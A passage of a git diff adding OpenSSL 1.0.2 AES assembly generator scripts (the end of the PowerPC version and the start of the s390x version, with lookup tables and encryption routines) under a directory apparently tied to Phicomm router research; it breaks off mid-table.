+	and	$acc09,$acc09,$mask1b
+	and	$acc10,$acc10,$mask1b
+	and	$acc11,$acc11,$mask1b
+	xor	$acc08,$acc08,$acc12	# r8
+	xor	$acc09,$acc09,$acc13
+	xor	$acc10,$acc10,$acc14
+	xor	$acc11,$acc11,$acc15
+
+	xor	$acc00,$acc00,$s0	# r2^r0
+	xor	$acc01,$acc01,$s1
+	xor	$acc02,$acc02,$s2
+	xor	$acc03,$acc03,$s3
+	xor	$acc04,$acc04,$s0	# r4^r0
+	xor	$acc05,$acc05,$s1
+	xor	$acc06,$acc06,$s2
+	xor	$acc07,$acc07,$s3
+___
+$code.=<<___;
+	rotrwi	$s0,$s0,8		# = ROTATE(r0,8)
+	rotrwi	$s1,$s1,8
+	xor	$s0,$s0,$acc00		# ^= r2^r0
+	rotrwi	$s2,$s2,8
+	xor	$s1,$s1,$acc01
+	rotrwi	$s3,$s3,8
+	xor	$s2,$s2,$acc02
+	xor	$s3,$s3,$acc03
+	xor	$acc00,$acc00,$acc08
+	xor	$acc01,$acc01,$acc09
+	xor	$acc02,$acc02,$acc10
+	xor	$acc03,$acc03,$acc11
+	xor	$s0,$s0,$acc04		# ^= r4^r0
+	rotrwi	$acc00,$acc00,24
+	xor	$s1,$s1,$acc05
+	rotrwi	$acc01,$acc01,24
+	xor	$s2,$s2,$acc06
+	rotrwi	$acc02,$acc02,24
+	xor	$s3,$s3,$acc07
+	rotrwi	$acc03,$acc03,24
+	xor	$acc04,$acc04,$acc08
+	xor	$acc05,$acc05,$acc09
+	xor	$acc06,$acc06,$acc10
+	xor	$acc07,$acc07,$acc11
+	xor	$s0,$s0,$acc08		# ^= r8 [^((r4^r0)^(r2^r0)=r4^r2)]
+	rotrwi	$acc04,$acc04,16
+	xor	$s1,$s1,$acc09
+	rotrwi	$acc05,$acc05,16
+	xor	$s2,$s2,$acc10
+	rotrwi	$acc06,$acc06,16
+	xor	$s3,$s3,$acc11
+	rotrwi	$acc07,$acc07,16
+	xor	$s0,$s0,$acc00		# ^= ROTATE(r8^r2^r0,24)
+	rotrwi	$acc08,$acc08,8
+	xor	$s1,$s1,$acc01
+	rotrwi	$acc09,$acc09,8
+	xor	$s2,$s2,$acc02
+	rotrwi	$acc10,$acc10,8
+	xor	$s3,$s3,$acc03
+	rotrwi	$acc11,$acc11,8
+	xor	$s0,$s0,$acc04		# ^= ROTATE(r8^r4^r0,16)
+	xor	$s1,$s1,$acc05
+	xor	$s2,$s2,$acc06
+	xor	$s3,$s3,$acc07
+	xor	$s0,$s0,$acc08		# ^= ROTATE(r8,8)	
+	xor	$s1,$s1,$acc09	
+	xor	$s2,$s2,$acc10	
+	xor	$s3,$s3,$acc11	
+
+	b	Ldec_compact_loop
+.align	4
+Ldec_compact_done:
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	xor	$s2,$s2,$t2
+	xor	$s3,$s3,$t3
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.AES_decrypt,.-.AES_decrypt
+
+.asciz	"AES for PPC, CRYPTOGAMS by <appro\@openssl.org>"
+.align	7
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-s390x.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-s390x.pl
new file mode 100644
index 0000000..e75dcd0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-s390x.pl
@@ -0,0 +1,2237 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# AES for s390x.
+
+# April 2007.
+#
+# Software performance improvement over gcc-generated code is ~70% and
+# in absolute terms is ~73 cycles per byte processed with 128-bit key.
+# You're likely to exclaim "why so slow?" Keep in mind that z-CPUs are
+# *strictly* in-order execution and issued instruction [in this case
+# load value from memory is critical] has to complete before execution
+# flow proceeds. S-boxes are compressed to 2KB[+256B].
+#
+# As for hardware acceleration support. It's basically a "teaser," as
+# it can and should be improved in several ways. Most notably support
+# for CBC is not utilized, nor multiple blocks are ever processed.
+# Then software key schedule can be postponed till hardware support
+# detection... Performance improvement over assembler is reportedly
+# ~2.5x, but can reach >8x [naturally on larger chunks] if proper
+# support is implemented.
+
+# May 2007.
+#
+# Implement AES_set_[en|de]crypt_key. Key schedule setup is avoided
+# for 128-bit keys, if hardware support is detected.
+
+# Januray 2009.
+#
+# Add support for hardware AES192/256 and reschedule instructions to
+# minimize/avoid Address Generation Interlock hazard and to favour
+# dual-issue z10 pipeline. This gave ~25% improvement on z10 and
+# almost 50% on z9. The gain is smaller on z10, because being dual-
+# issue z10 makes it improssible to eliminate the interlock condition:
+# critial path is not long enough. Yet it spends ~24 cycles per byte
+# processed with 128-bit key.
+#
+# Unlike previous version hardware support detection takes place only
+# at the moment of key schedule setup, which is denoted in key->rounds.
+# This is done, because deferred key setup can't be made MT-safe, not
+# for keys longer than 128 bits.
+#
+# Add AES_cbc_encrypt, which gives incredible performance improvement,
+# it was measured to be ~6.6x. It's less than previously mentioned 8x,
+# because software implementation was optimized.
+
+# May 2010.
+#
+# Add AES_ctr32_encrypt. If hardware-assisted, it provides up to 4.3x
+# performance improvement over "generic" counter mode routine relying
+# on single-block, also hardware-assisted, AES_encrypt. "Up to" refers
+# to the fact that exact throughput value depends on current stack
+# frame alignment within 4KB page. In worst case you get ~75% of the
+# maximum, but *on average* it would be as much as ~98%. Meaning that
+# worst case is unlike, it's like hitting ravine on plateau.
+
+# November 2010.
+#
+# Adapt for -m31 build. If kernel supports what's called "highgprs"
+# feature on Linux [see /proc/cpuinfo], it's possible to use 64-bit
+# instructions and achieve "64-bit" performance even in 31-bit legacy
+# application context. The feature is not specific to any particular
+# processor, as long as it's "z-CPU". Latter implies that the code
+# remains z/Architecture specific. On z990 it was measured to perform
+# 2x better than code generated by gcc 4.3.
+
+# December 2010.
+#
+# Add support for z196 "cipher message with counter" instruction.
+# Note however that it's disengaged, because it was measured to
+# perform ~12% worse than vanilla km-based code...
+
+# February 2011.
+#
+# Add AES_xts_[en|de]crypt. This includes support for z196 km-xts-aes
+# instructions, which deliver ~70% improvement at 8KB block size over
+# vanilla km-based code, 37% - at most like 512-bytes block size.
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+	$SIZE_T=4;
+	$g="";
+} else {
+	$SIZE_T=8;
+	$g="g";
+}
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$softonly=0;	# allow hardware support
+
+$t0="%r0";	$mask="%r0";
+$t1="%r1";
+$t2="%r2";	$inp="%r2";
+$t3="%r3";	$out="%r3";	$bits="%r3";
+$key="%r4";
+$i1="%r5";
+$i2="%r6";
+$i3="%r7";
+$s0="%r8";
+$s1="%r9";
+$s2="%r10";
+$s3="%r11";
+$tbl="%r12";
+$rounds="%r13";
+$ra="%r14";
+$sp="%r15";
+
+$stdframe=16*$SIZE_T+4*8;
+
+sub _data_word()
+{ my $i;
+    while(defined($i=shift)) { $code.=sprintf".long\t0x%08x,0x%08x\n",$i,$i; }
+}
+
+$code=<<___;
+.text
+
+.type	AES_Te,\@object
+.align	256
+AES_Te:
+___
+&_data_word(
+	0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d,
+	0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554,
+	0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d,
+	0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a,
+	0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87,
+	0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b,
+	0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea,
+	0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b,
+	0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a,
+	0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f,
+	0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108,
+	0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f,
+	0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e,
+	0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5,
+	0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d,
+	0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f,
+	0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e,
+	0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb,
+	0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce,
+	0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497,
+	0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c,
+	0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed,
+	0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b,
+	0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a,
+	0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16,
+	0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594,
+	0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81,
+	0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3,
+	0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a,
+	0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504,
+	0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163,
+	0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d,
+	0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f,
+	0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739,
+	0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47,
+	0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395,
+	0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f,
+	0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883,
+	0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c,
+	0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76,
+	0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e,
+	0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4,
+	0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6,
+	0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b,
+	0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7,
+	0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0,
+	0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25,
+	0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818,
+	0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72,
+	0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651,
+	0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21,
+	0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85,
+	0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa,
+	0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12,
+	0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0,
+	0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9,
+	0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133,
+	0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7,
+	0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920,
+	0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a,
+	0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17,
+	0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8,
+	0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11,
+	0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a);
+$code.=<<___;
+# Te4[256]
+.byte	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
+.byte	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+.byte	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+.byte	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+.byte	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+.byte	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+.byte	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+.byte	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+.byte	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+.byte	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+.byte	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+.byte	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+.byte	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+.byte	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+.byte	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+.byte	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+.byte	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+.byte	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+.byte	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+.byte	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+.byte	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+.byte	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+.byte	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+.byte	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+.byte	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+.byte	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+.byte	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+.byte	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+.byte	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+.byte	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+.byte	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+.byte	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+# rcon[]
+.long	0x01000000, 0x02000000, 0x04000000, 0x08000000
+.long	0x10000000, 0x20000000, 0x40000000, 0x80000000
+.long	0x1B000000, 0x36000000, 0, 0, 0, 0, 0, 0
+.align	256
+.size	AES_Te,.-AES_Te
+
+# void AES_encrypt(const unsigned char *inp, unsigned char *out,
+# 		 const AES_KEY *key) {
+.globl	AES_encrypt
+.type	AES_encrypt,\@function
+AES_encrypt:
+___
+$code.=<<___ if (!$softonly);
+	l	%r0,240($key)
+	lhi	%r1,16
+	clr	%r0,%r1
+	jl	.Lesoft
+
+	la	%r1,0($key)
+	#la	%r2,0($inp)
+	la	%r4,0($out)
+	lghi	%r3,16		# single block length
+	.long	0xb92e0042	# km %r4,%r2
+	brc	1,.-4		# can this happen?
+	br	%r14
+.align	64
+.Lesoft:
+___
+$code.=<<___;
+	stm${g}	%r3,$ra,3*$SIZE_T($sp)
+
+	llgf	$s0,0($inp)
+	llgf	$s1,4($inp)
+	llgf	$s2,8($inp)
+	llgf	$s3,12($inp)
+
+	larl	$tbl,AES_Te
+	bras	$ra,_s390x_AES_encrypt
+
+	l${g}	$out,3*$SIZE_T($sp)
+	st	$s0,0($out)
+	st	$s1,4($out)
+	st	$s2,8($out)
+	st	$s3,12($out)
+
+	lm${g}	%r6,$ra,6*$SIZE_T($sp)
+	br	$ra
+.size	AES_encrypt,.-AES_encrypt
+
+.type   _s390x_AES_encrypt,\@function
+.align	16
+_s390x_AES_encrypt:
+	st${g}	$ra,15*$SIZE_T($sp)
+	x	$s0,0($key)
+	x	$s1,4($key)
+	x	$s2,8($key)
+	x	$s3,12($key)
+	l	$rounds,240($key)
+	llill	$mask,`0xff<<3`
+	aghi	$rounds,-1
+	j	.Lenc_loop
+.align	16
+.Lenc_loop:
+	sllg	$t1,$s0,`0+3`
+	srlg	$t2,$s0,`8-3`
+	srlg	$t3,$s0,`16-3`
+	srl	$s0,`24-3`
+	nr	$s0,$mask
+	ngr	$t1,$mask
+	nr	$t2,$mask
+	nr	$t3,$mask
+
+	srlg	$i1,$s1,`16-3`	# i0
+	sllg	$i2,$s1,`0+3`
+	srlg	$i3,$s1,`8-3`
+	srl	$s1,`24-3`
+	nr	$i1,$mask
+	nr	$s1,$mask
+	ngr	$i2,$mask
+	nr	$i3,$mask
+
+	l	$s0,0($s0,$tbl)	# Te0[s0>>24]
+	l	$t1,1($t1,$tbl)	# Te3[s0>>0]
+	l	$t2,2($t2,$tbl) # Te2[s0>>8]
+	l	$t3,3($t3,$tbl)	# Te1[s0>>16]
+
+	x	$s0,3($i1,$tbl)	# Te1[s1>>16]
+	l	$s1,0($s1,$tbl)	# Te0[s1>>24]
+	x	$t2,1($i2,$tbl)	# Te3[s1>>0]
+	x	$t3,2($i3,$tbl)	# Te2[s1>>8]
+
+	srlg	$i1,$s2,`8-3`	# i0
+	srlg	$i2,$s2,`16-3`	# i1
+	nr	$i1,$mask
+	nr	$i2,$mask
+	sllg	$i3,$s2,`0+3`
+	srl	$s2,`24-3`
+	nr	$s2,$mask
+	ngr	$i3,$mask
+
+	xr	$s1,$t1
+	srlg	$ra,$s3,`8-3`	# i1
+	sllg	$t1,$s3,`0+3`	# i0
+	nr	$ra,$mask
+	la	$key,16($key)
+	ngr	$t1,$mask
+
+	x	$s0,2($i1,$tbl)	# Te2[s2>>8]
+	x	$s1,3($i2,$tbl)	# Te1[s2>>16]
+	l	$s2,0($s2,$tbl)	# Te0[s2>>24]
+	x	$t3,1($i3,$tbl)	# Te3[s2>>0]
+
+	srlg	$i3,$s3,`16-3`	# i2
+	xr	$s2,$t2
+	srl	$s3,`24-3`
+	nr	$i3,$mask
+	nr	$s3,$mask
+
+	x	$s0,0($key)
+	x	$s1,4($key)
+	x	$s2,8($key)
+	x	$t3,12($key)
+
+	x	$s0,1($t1,$tbl)	# Te3[s3>>0]
+	x	$s1,2($ra,$tbl)	# Te2[s3>>8]
+	x	$s2,3($i3,$tbl)	# Te1[s3>>16]
+	l	$s3,0($s3,$tbl)	# Te0[s3>>24]
+	xr	$s3,$t3
+
+	brct	$rounds,.Lenc_loop
+	.align	16
+
+	sllg	$t1,$s0,`0+3`
+	srlg	$t2,$s0,`8-3`
+	ngr	$t1,$mask
+	srlg	$t3,$s0,`16-3`
+	srl	$s0,`24-3`
+	nr	$s0,$mask
+	nr	$t2,$mask
+	nr	$t3,$mask
+
+	srlg	$i1,$s1,`16-3`	# i0
+	sllg	$i2,$s1,`0+3`
+	ngr	$i2,$mask
+	srlg	$i3,$s1,`8-3`
+	srl	$s1,`24-3`
+	nr	$i1,$mask
+	nr	$s1,$mask
+	nr	$i3,$mask
+
+	llgc	$s0,2($s0,$tbl)	# Te4[s0>>24]
+	llgc	$t1,2($t1,$tbl)	# Te4[s0>>0]
+	sll	$s0,24
+	llgc	$t2,2($t2,$tbl)	# Te4[s0>>8]
+	llgc	$t3,2($t3,$tbl)	# Te4[s0>>16]
+	sll	$t2,8
+	sll	$t3,16
+
+	llgc	$i1,2($i1,$tbl)	# Te4[s1>>16]
+	llgc	$s1,2($s1,$tbl)	# Te4[s1>>24]
+	llgc	$i2,2($i2,$tbl)	# Te4[s1>>0]
+	llgc	$i3,2($i3,$tbl)	# Te4[s1>>8]
+	sll	$i1,16
+	sll	$s1,24
+	sll	$i3,8
+	or	$s0,$i1
+	or	$s1,$t1
+	or	$t2,$i2
+	or	$t3,$i3
+	
+	srlg	$i1,$s2,`8-3`	# i0
+	srlg	$i2,$s2,`16-3`	# i1
+	nr	$i1,$mask
+	nr	$i2,$mask
+	sllg	$i3,$s2,`0+3`
+	srl	$s2,`24-3`
+	ngr	$i3,$mask
+	nr	$s2,$mask
+
+	sllg	$t1,$s3,`0+3`	# i0
+	srlg	$ra,$s3,`8-3`	# i1
+	ngr	$t1,$mask
+
+	llgc	$i1,2($i1,$tbl)	# Te4[s2>>8]
+	llgc	$i2,2($i2,$tbl)	# Te4[s2>>16]
+	sll	$i1,8
+	llgc	$s2,2($s2,$tbl)	# Te4[s2>>24]
+	llgc	$i3,2($i3,$tbl)	# Te4[s2>>0]
+	sll	$i2,16
+	nr	$ra,$mask
+	sll	$s2,24
+	or	$s0,$i1
+	or	$s1,$i2
+	or	$s2,$t2
+	or	$t3,$i3
+
+	srlg	$i3,$s3,`16-3`	# i2
+	srl	$s3,`24-3`
+	nr	$i3,$mask
+	nr	$s3,$mask
+
+	l	$t0,16($key)
+	l	$t2,20($key)
+
+	llgc	$i1,2($t1,$tbl)	# Te4[s3>>0]
+	llgc	$i2,2($ra,$tbl)	# Te4[s3>>8]
+	llgc	$i3,2($i3,$tbl)	# Te4[s3>>16]
+	llgc	$s3,2($s3,$tbl)	# Te4[s3>>24]
+	sll	$i2,8
+	sll	$i3,16
+	sll	$s3,24
+	or	$s0,$i1
+	or	$s1,$i2
+	or	$s2,$i3
+	or	$s3,$t3
+
+	l${g}	$ra,15*$SIZE_T($sp)
+	xr	$s0,$t0
+	xr	$s1,$t2
+	x	$s2,24($key)
+	x	$s3,28($key)
+
+	br	$ra	
+.size	_s390x_AES_encrypt,.-_s390x_AES_encrypt
+___
+
+$code.=<<___;
+.type	AES_Td,\@object
+.align	256
+AES_Td:
+___
+&_data_word(
+	0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96,
+	0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393,
+	0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25,
+	0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f,
+	0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1,
+	0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6,
+	0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da,
+	0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844,
+	0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd,
+	0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4,
+	0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45,
+	0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94,
+	0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7,
+	0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a,
+	0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5,
+	0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c,
+	0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1,
+	0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a,
+	0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75,
+	0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051,
+	0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46,
+	0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff,
+	0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77,
+	0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb,
+	0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000,
+	0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e,
+	0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927,
+	0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a,
+	0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e,
+	0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16,
+	0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d,
+	0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8,
+	0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd,
+	0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34,
+	0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163,
+	0xd731dcca, 0x42638510, 0x13972240, 0x84c61120,
+	0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d,
+	0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0,
+	0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422,
+	0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef,
+	0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36,
+	0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4,
+	0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662,
+	0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5,
+	0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3,
+	0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b,
+	0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8,
+	0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6,
+	0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6,
+	0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0,
+	0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815,
+	0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f,
+	0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df,
+	0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f,
+	0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e,
+	0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713,
+	0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89,
+	0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c,
+	0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf,
+	0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86,
+	0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f,
+	0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541,
+	0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190,
+	0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742);
+$code.=<<___;
+# Td4[256]
+.byte	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
+.byte	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+.byte	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+.byte	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+.byte	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+.byte	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+.byte	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+.byte	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
+.byte	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+.byte	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+.byte	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+.byte	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+.byte	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+.byte	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+.byte	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+.byte	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+.byte	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
